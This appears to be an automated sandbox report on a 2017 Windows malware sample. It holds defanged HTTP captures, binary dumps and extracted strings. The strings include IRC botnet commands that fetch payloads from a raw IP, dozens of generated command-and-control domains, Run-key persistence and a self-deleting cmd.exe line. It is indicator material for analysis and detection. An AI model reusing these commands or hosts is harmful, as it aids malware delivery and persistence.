Set-Cookie: enc_aff_session_4=ENC0391055f458cc8b37a857b50cf2cbe4e5c01da4e3762e92b0cf8bcd70833c1f1efdda3a26923f113d99e769ea43a114742b8db68809880e01a1d3bb95070085d01aaaec65a60daa189fe1f566eb9a5124e35dca6515f180763d031992487d9ae69f4c8ab1a030345ed76ef11bd4dbab698d4f0d9494223af014ce420c84e53d2f00aa714e4; expires=Wed, 26 Jul 2017 09:49:44 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Wed, 20 May 2020 20:29:44 GMT; path=/;
tracking_id: 102818683555b138ae887006bd7923
X-Robots-Tag: noindex, nofollow
Content-Length: 488
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://fun.losscook.bid/offer.php?affId=3226&trackingId=2442
18551&instId=4364&ho_trackingid=102818683555b138ae887006bd7923
&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.
16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104c
ca24294ae7d8d45ce8d028&v=3">here</a>.</p>.</body
></html>...
<<< skipped >>>


.....n.xC..$Qb|....K.4]\>j.l_2Y.(....1.....I.<Hg..~.] S.....




.....R.Zg?.|L.];..@N.<HJ<k.uO*K. ..lq.V.qO{.....D..~...db..5..s.
.."...4.;..<'........%r../8........".Yt.K0.3 .9cx..X..8.......v...F
.......0xHS.o;4."..2`.V.`..9..^.h.. ..@....j..H.....9.O..'....?...._..
...._........cz.....r.......\qr.............a.t. ....c.......i....v.R.
..S..............3 @.(ul.w.....i.....c'..6%....|t.F...q.r..




@=.D.j...d.




..D.$....r.V(D.8B....G_...B.fxD*9...=...}J.a...rW....\4U%.?...rY......
.5....M....U.623a.!..4C.x.Y...u.a.Ulm.Z....K.dt..?...o....D.$....r.V(D
.8B....G_...B.fxD*9...=...}J.a...rW....\4U%.?...rY.......5....M....U.6
23a.!..4C.x.Y...u.a.Ulm.Z....K.dt..?...o..



GET hXXp://fun.losscook.bid/offer.php?affId=3226&trackingId=244218551&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: fun.losscook.bid
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 3808
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Mon, 26 Jun 2017 09:49:32 GMT
X-Cache: Miss from cloudfront
Via: 1.1 a9e1c5fff6a2739d3f7026c216819292.cloudfront.net (CloudFront)
X-Amz-Cf-Id: i7ut4Xvh-5P_-WV00kiFYbu2ky0zKT4Y6iku9EKww65x6xjhm4NckA==
.......g%...........\.<.vey....47.].y..I.!..X.Cq..R.D...]pb.[..T..=
{.J.G.........:..d@..t...IJ...g]..^u..Bt."es.......v}.uqmj.fw...|K.6&g
t;r.!...I.^|..!...u..5..:._..k.t.....9y ....<....-?.h.....v..s`2\.T
.....Ba.....-..E....NQ...1^.ZZZ..:.D\.(5.F..............-({.<.....q
...D/.{ZZu[......@?...#.O.l....@..8.k&w.....~.LJ..)......1.z.f...(.0.f
.8T..??.. ..8.Y...F..{......U.H.?.z...^..`i.8g.S_yQ.....i6.H|..!..IA&l
t;.=............ .fn.-...=.&..Yei......~<.......S@.R..k.~...../..l.
.q....7K...MNK....)v....<.'.^f......C..4...X.M.T..j].(5.CB._iT..g..
e`W..v.e.o..."..s...Z....1-...m.....`. .3~.....f.@.{ER...9h..".O....\.
...]...u.eR.W.t...i\5..K?x......=.R.A..,..M....:........HG........h..,
..dc..W...G=..O.X.K.w..|.*$.p...!.U9*7.....m@8....~z..w..^c8'....b.5.h
.*..>j.PY..X.F.}(....L<1U.......4...p.....~$....<D.=...{.....
..'..t.LM.%......\...Smd.....[.f... U.G&4.....c/;.,j|s.K..Q>..@..|.
..(.....T....? ...h...X..O..<bRs...%.....S I.U.}H%.Q8V..xm.....Z...
..yR..'&?...7{..r;*N.....N...[I.F.*....w.....>..lj...v#..K.`N..L.`=
.]...1-.<..0Vs.hG..d..2.....i!t..aoEyu.b@.6..._-...[..}.p{.'....%..
.q..|...^.{q...wW..........2..:.....H-.%:.G9j6...H....QX......uTk;.Z,.
.....@..t...Is;..$.1..cFV..Q.J........?..2W.>.l}.T.....4..W..u...:j
.?"a.d...]..^..P.)..i....%A.2..!........P.3.....d?E....9.\....[...A...
_..%...A..*.*.ji....x2...v..0.....9..;*.z..'.J..l..I(......H..\}....f.
............._.i~...J5W.7.U6..5.....<...2....O...-.QZ..$.0....?qow.
".P.....J~x.>.U..)...r.F.u.aw..?..05...'A.m4p5..7._.......4].l@
<<< skipped >>>

The Virus connects to the servers at the folowing location(s):

%original file name%.exe_3788:

!Win32 .EXE.
/Default.htm
mscoree.dll
Please contact the application's support team for more information.
portuguese-brazilian
GetProcessWindowStation
user32.dll
kernel32.dll
.tgPV
udPj
FTPjK
FtPj;
C.PjRVj
u.VV3
c:\%original file name%.exe
<LINK REL=STYLESHEET HREF="icw.css" TYPE="text/css">
<SCRIPT LANGUAGE="Javascript" src="icw.js"></SCRIPT>
<IMG SRC="icwhd2.gif" WIDTH=317 HEIGHT=71 BORDER="0">
<img src="arrow_dwn.gif" alt="" border="0"><br>
<IMG SRC="nvlinfad.gif" alt="" WIDTH=1 HEIGHT=291 BORDER="0">
<IMG SRC="linefade_hrz.gif" alt="" WIDTH=17 HEIGHT=1 BORDER="0">
<DIV CLASS="wrapper" Style="background:url(toccolor.gif);" ID=loc2><A HREF="" onclick=doNothing() onfocus=selectIt(1) Style="color:red;" ID="menu_1">Welcome</A></DIV>
<BUTTON DIR=LTR CLASS="buttons" onclick="self.close()" Style="position:absolute;top:349px;left:498px;width:70px;" ACCESSKEY="C" ID=loc7><u>C</u>lose</BUTTON>
<img id=globe1 src="hm_globe.jpg" width=148 height=148 border="0">
<img id=globe2 style="position: absolute; top:6px; left:61px; width=148px; height=148px; z-index:9; clip:rect(25px 37px 78px 0px)" src="hm_globe.jpg">
<P ID=loc10>The Internet includes the World Wide Web, which enables you to see documents in richly formatted text and pictures. Many Web pages link to other Web pages, so it's easy to browse, or "surf", a large amount of information by just clicking with your mouse.</P>
<P ID=loc14>Perhaps you're wondering how the Internet might help you. Do you want to plan a trip? Check out sports scores? Shop online for books, clothes, or even cars? Read online newspapers and magazines from around the world?</P>
<P ID=loc18>Connecting to the Internet involves a modem, a phone line, and an Internet service provider (ISP). An ISP is a company that provides you with Internet connection service through your phone line. You'll find a wide range of ISPs that provide different services, such as e-mail or your own Web page, and pricing levels. If you want, you can choose one in the Internet Connection wizard.</P>
.wrapper {
.detail {
.content {
.buttons {
document.oncontextmenu=killcontext;
document.onkeydown=keyhandler;
document.onmousedown=killrightmouse;
window.onload=init;
event.returnValue = false;
var oItem = document.all["menu_"   iItem];
var oItemWrap = oItem.parentElement;
iCurrent = oCurrent.id.substr(oCurrent.id.indexOf("_")   1);
oCurrent.parentElement.style.backgroundImage = "none";
oCurrent.style.color = normColor;
oCurrent.style.cursor = "hand";
oCurrent.style.textDecoration = "";
document.all["content_"   iCurrent].style.display = "none";
oItemWrap.style.backgroundImage = "url(toccolor.gif)";
oItem.style.cursor = "default";
oItem.style.color = highColor;
oItem.style.textDecoration = "none";
hzLine.style.top = oItemWrap.offsetTop - 73;
hzLine.style.visibility = "visible";
document.all["content_"   iItem].style.display = "inline";
if (event != null) event.returnValue = false;
oCurrent = document.all.menu_1;
// Key handler
// general purpose key handler
function keyhandler()
var iKey = window.event.keyCode;
//up, down and tab keys for toc
switch(iKey){
document.all["menu_"   iFocus].focus();
// Function key f5
if (iKey == 0x74) {
window.event.cancelBubble = true;
window.event.returnValue = false;
//control hotkeys
if(window.event.ctrlKey) {
switch(iKey) {
case 0x65: // keypad 5
window.event.returnValue = false;
//test for escape key and bail if appropriate
if(window.event.keyCode == 0x1b) {
self.close();
window.event.returnValue = false;
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
hustxt.com
jhampt.com
naltix.com
ukerix.com
fbibiz.com
NICK kbmhirat
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x  *%s
KERNEL32.DLL
windowsupdate
drweb
ole32.dll
urlmon.dll
CreateURLMoniker
OLEAUT32.dll
MSHTML.DLL
6.00.2600.0000 (xpclient.010817-1148)
icwtutor.exe
Windows
Operating System
6.00.2600.0000
ARROW_DWN.GIF
DEFAULT.HTM
HM_GLOBE.JPG
ICW.CSS
ICW.JS
ICWHD2.GIF
LINEFADE_HRZ.GIF
NVLINFAD.GIF
TOCCOLOR.GIF

%original file name%.exe_3788_rwx_000A0000_00008000:

ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
hustxt.com
jhampt.com
naltix.com
ukerix.com
fbibiz.com
NICK nxtitcxs
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x  *%s
KERNEL32.DLL
windowsupdate
drweb
:u. PRIVMSG nxtitcxs :!get hXXp://185.145.131.197:9/mk/li.jpg
:u. PRIVMSG nxtitcxs :!get hXXp://185.145.131.197:9/mk/ic.jpg
UNC\192.168.50.163\SANDBOXOUTPUT\2017-06-26\7874A076B2F09A3F7969B819CB4955E0\DUMPS\7874A076B2F09A3F7969B819CB4955E0.EXE_3788.DMP
%WinDir%\SYSTEM32\MAGNIFY.EXE
PLAYER.EXE
iuayhc.com
koeore.com
vjqwcn.com
altfrk.com
ldqoqh.com
zonaeh.com
mxdonb.com
yzblel.com
yateek.com
qgvkvi.com
eatiem.com
nmkdce.com
uzbbmc.com
slihvp.com
qmhqsx.com
fxeehe.com
zpajoi.com
gqihno.com
ndwxfb.com
hecelb.com
rlhbxw.com
vbtyid.com
eifypo.com
tewauv.com
pvaadh.com
ieyimg.com
aehzzq.com
qlremo.com
etkiwx.com
odfpip.com
jzoetx.com
cvdxai.com
ojzyoe.com
xophrk.com
zzxpac.com
uuacla.com
tvvyua.com
uimqdi.com
ksvyuu.com
rhbgyc.com
jsumot.com
eaorba.com
jwddsi.com
hydoye.com
aayogx.com
eakgwm.com
zroypl.com
iakaeu.com
oyuvyi.com
hvoihl.com
orndsy.com
fcuhln.com
vvfihg.com
dljeva.com
ramola.com
voeinl.com
phkrqp.com
vakeat.com
ztbjvh.com
qcczbr.com
ibluie.com
yaoglr.com
uebdwg.com
rheobg.com
mieuof.com
fclexk.com
aosvol.com
vtqvbu.com
ebyeqk.com
nluphu.com
ogeagu.com
eicssl.com
hkicuu.com
blurbi.com
bzepui.com
gvqdia.com
vyxbyy.com
maqleg.com
qaftzy.com
exwaek.com
uzaneb.com
etzziq.com
dwaimw.com
auswii.com
joqupn.com
aaonbn.com
vazqus.com
abooba.com
uodtgy.com
myituj.com
uomyya.com
gypheh.com
oiovej.com
xowqiv.com
yubths.com
ciaaoa.com
xhevvr.com
xdlacf.com
kqsapt.com
erhxxc.com
JOIN #.130

%original file name%.exe_3788_rwx_01001000_0001B000:

/Default.htm
mscoree.dll
Please contact the application's support team for more information.
portuguese-brazilian
GetProcessWindowStation
user32.dll
kernel32.dll
.tgPV
udPj
FTPjK
FtPj;
C.PjRVj
u.VV3
c:\%original file name%.exe
<LINK REL=STYLESHEET HREF="icw.css" TYPE="text/css">
<SCRIPT LANGUAGE="Javascript" src="icw.js"></SCRIPT>
<IMG SRC="icwhd2.gif" WIDTH=317 HEIGHT=71 BORDER="0">
<img src="arrow_dwn.gif" alt="" border="0"><br>
<IMG SRC="nvlinfad.gif" alt="" WIDTH=1 HEIGHT=291 BORDER="0">
<IMG SRC="linefade_hrz.gif" alt="" WIDTH=17 HEIGHT=1 BORDER="0">
<DIV CLASS="wrapper" Style="background:url(toccolor.gif);" ID=loc2><A HREF="" onclick=doNothing() onfocus=selectIt(1) Style="color:red;" ID="menu_1">Welcome</A></DIV>
<BUTTON DIR=LTR CLASS="buttons" onclick="self.close()" Style="position:absolute;top:349px;left:498px;width:70px;" ACCESSKEY="C" ID=loc7><u>C</u>lose</BUTTON>
<img id=globe1 src="hm_globe.jpg" width=148 height=148 border="0">
<img id=globe2 style="position: absolute; top:6px; left:61px; width=148px; height=148px; z-index:9; clip:rect(25px 37px 78px 0px)" src="hm_globe.jpg">
<P ID=loc10>The Internet includes the World Wide Web, which enables you to see documents in richly formatted text and pictures. Many Web pages link to other Web pages, so it's easy to browse, or "surf", a large amount of information by just clicking with your mouse.</P>
<P ID=loc14>Perhaps you're wondering how the Internet might help you. Do you want to plan a trip? Check out sports scores? Shop online for books, clothes, or even cars? Read online newspapers and magazines from around the world?</P>
<P ID=loc18>Connecting to the Internet involves a modem, a phone line, and an Internet service provider (ISP). An ISP is a company that provides you with Internet connection service through your phone line. You'll find a wide range of ISPs that provide different services, such as e-mail or your own Web page, and pricing levels. If you want, you can choose one in the Internet Connection wizard.</P>
.wrapper {
.detail {
.content {
.buttons {
document.oncontextmenu=killcontext;
document.onkeydown=keyhandler;
document.onmousedown=killrightmouse;
window.onload=init;
event.returnValue = false;
var oItem = document.all["menu_"   iItem];
var oItemWrap = oItem.parentElement;
iCurrent = oCurrent.id.substr(oCurrent.id.indexOf("_")   1);
oCurrent.parentElement.style.backgroundImage = "none";
oCurrent.style.color = normColor;
oCurrent.style.cursor = "hand";
oCurrent.style.textDecoration = "";
document.all["content_"   iCurrent].style.display = "none";
oItemWrap.style.backgroundImage = "url(toccolor.gif)";
oItem.style.cursor = "default";
oItem.style.color = highColor;
oItem.style.textDecoration = "none";
hzLine.style.top = oItemWrap.offsetTop - 73;
hzLine.style.visibility = "visible";
document.all["content_"   iItem].style.display = "inline";
if (event != null) event.returnValue = false;
oCurrent = document.all.menu_1;
// Key handler
// general purpose key handler
function keyhandler()
var iKey = window.event.keyCode;
//up, down and tab keys for toc
switch(iKey){
document.all["menu_"   iFocus].focus();
// Function key f5
if (iKey == 0x74) {
window.event.cancelBubble = true;
window.event.returnValue = false;
//control hotkeys
if(window.event.ctrlKey) {
switch(iKey) {
case 0x65: // keypad 5
window.event.returnValue = false;
//test for escape key and bail if appropriate
if(window.event.keyCode == 0x1b) {
self.close();
window.event.returnValue = false;
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
hustxt.com
jhampt.com
naltix.com
ukerix.com
fbibiz.com
NICK kbmhirat
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x  *%s
KERNEL32.DLL
windowsupdate
drweb
ole32.dll
urlmon.dll
CreateURLMoniker
OLEAUT32.dll
MSHTML.DLL

INJ98A6.tmp_2368:

.text
`.rdata
@.data
.rsrc
@.reloc
D$@j.Xf
FH<.tP<[tL<\tH<*tD<|t@<^t<<$t8
PSSSSSSh
u$SShe
t.SSj
PSSh\
j.Yf;
_tcPVj@
.PjRW
Kernel32.dll
CCmdTarget
Comdlg32.dll
Comctl32.dll
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CNotSupportedException
TaskDialogIndirect
RegDeleteKeyExW
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
\*/:<>?|"
ec2-34-225-180-32.compute-1.amazonaws.com
390113312
()$^.* ?[]|\-{},:=!
AmigoDistrib.exe
%LOCALAPPDATA%\Amigo\Application\amigo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
URL =
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
aswhookx.dll
Line %d, Column %d
Bad URL.
Cannot get file size, bad URL.
Request cannot be completed on current url.
Unable to get HTTP status:
ReportStart request failed. Bad data received: "
ReportFinish request failed. Bad data received: "
ReportComponent request failed. Bad data received: "
ReportDefaultComponent failed. Bad data received: "
ReportClose request failed. Bad data received: "
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
HKEY_CLASSES_ROOT\http\shell\open\command
opera
HttpSendRequestW
HttpQueryInfoW
HttpOpenRequestW
InternetCanonicalizeUrlW
WININET.dll
GetProcessHeap
GetCPInfo
KERNEL32.dll
EnumWindows
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
CreateDialogIndirectParamW
USER32.dll
GetViewportExtEx
SetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
RegDeleteKeyW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
GdiplusShutdown
gdiplus.dll
OLEACC.dll
zcÁ
.?AVCCmdUI@@
.PAVCException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.PAVCMemoryException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.?AVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.PAVCFileException@@
.?AVCCmdTarget@@
.?AVHttpDownloaderException@@
.?AVHttpDownloader@@
reV%%F
q2.DN
p~uR%x
#.sZa
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
"All files (*.*)" = "
(*.*)"
"All files (*.*)" = "All files (*.*)"
3M4
6|7V8
9"9&9*919
2#21292?2
8#8)848[8
4 4$4(4,40444~4
4_5l5x5
4 4&404;4~4
1 1$1(1,10141
4 4$4(4,4044484<4@4
=,=8=\=|=
HKernel32.dll
HComdlg32.dll
Ikernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
accKeyboardShortcut
commctrl_DragListMsg
Afx:%p:%x
Afx:%p:%x:%p:%p:%p
user32.dll
hhctrl.ocx
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
Df:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
comctl32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Dmfcm120u.dll
dshell32.dll
ED2D1.dll
DWrite.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
lXXxXXXXXXXX
combase.dll
Fmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
cmd.exe /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "%s"
cmd.exe /C timeout 3 > Nul & Del "%s"
hXXp://megadowl.com/terms-ru.html
All files (*.*)
r.ico
. Component url:
chrome
firefox
s.lnk
\amigo.exe
application/exe
application/x-dosexec
WINDOWS
\\.\PhysicalDrive%d
Advapi32.dll
x-x-x-x-x-x
oIphlpapi.dll
hXXp://
explorer.exe
_Label_Url_
Wininet.dll
ntdll.dll
C:\Windows\TEMP\INJ98A6.tmp
Citizen_Cope.mp3
1340951093
C:\Download
5.5.4
cubeload.ru
request/report?
&key=
User-Agent: /Content-Type: application/x-www-form-urlencoded
\\.\PhysicalDrive
ÞSKTOP%
%DOWNLAODS%
windows
downloads!hXXp://megadowl.com/terms-ru.html
HKLM\Software\WineYHKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\ProgIdNHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\regexp:.*\DisplayName
file_url
file_url_domain
send_report_type
reg_key
ReportStart failed
ReportClose failed
ReportFinish failed
ReportComponent failed
by url:
Failed executing file:
report_delay
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS?HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version
. File URL:
HKEY_CURRENT_USER\Software\Wine HKEY_LOCAL_MACHINE\Software\Wine,SOFTWARE\Microsoft\Windows NT\CurrentVersion
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]

INJ98A6.tmp_2368_rwx_00400000_00154000:

.text
`.rdata
@.data
.rsrc
@.reloc
D$@j.Xf
FH<.tP<[tL<\tH<*tD<|t@<^t<<$t8
PSSSSSSh
u$SShe
t.SSj
PSSh\
j.Yf;
_tcPVj@
.PjRW
Kernel32.dll
CCmdTarget
Comdlg32.dll
Comctl32.dll
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CNotSupportedException
TaskDialogIndirect
RegDeleteKeyExW
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
\*/:<>?|"
ec2-34-225-180-32.compute-1.amazonaws.com
390113312
()$^.* ?[]|\-{},:=!
AmigoDistrib.exe
%LOCALAPPDATA%\Amigo\Application\amigo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
URL =
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
aswhookx.dll
Line %d, Column %d
Bad URL.
Cannot get file size, bad URL.
Request cannot be completed on current url.
Unable to get HTTP status:
ReportStart request failed. Bad data received: "
ReportFinish request failed. Bad data received: "
ReportComponent request failed. Bad data received: "
ReportDefaultComponent failed. Bad data received: "
ReportClose request failed. Bad data received: "
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
HKEY_CLASSES_ROOT\http\shell\open\command
opera
HttpSendRequestW
HttpQueryInfoW
HttpOpenRequestW
InternetCanonicalizeUrlW
WININET.dll
GetProcessHeap
GetCPInfo
KERNEL32.dll
EnumWindows
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
CreateDialogIndirectParamW
USER32.dll
GetViewportExtEx
SetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
RegDeleteKeyW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
GdiplusShutdown
gdiplus.dll
OLEACC.dll
zcÁ
.?AVCCmdUI@@
.PAVCException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.PAVCMemoryException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.?AVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.PAVCFileException@@
.?AVCCmdTarget@@
.?AVHttpDownloaderException@@
.?AVHttpDownloader@@
reV%%F
q2.DN
p~uR%x
#.sZa
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
"All files (*.*)" = "
(*.*)"
"All files (*.*)" = "All files (*.*)"
3M4
6|7V8
9"9&9*919
2#21292?2
8#8)848[8
4 4$4(4,40444~4
4_5l5x5
4 4&404;4~4
1 1$1(1,10141
4 4$4(4,4044484<4@4
=,=8=\=|=
HKernel32.dll
HComdlg32.dll
Ikernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
accKeyboardShortcut
commctrl_DragListMsg
Afx:%p:%x
Afx:%p:%x:%p:%p:%p
user32.dll
hhctrl.ocx
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
Df:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
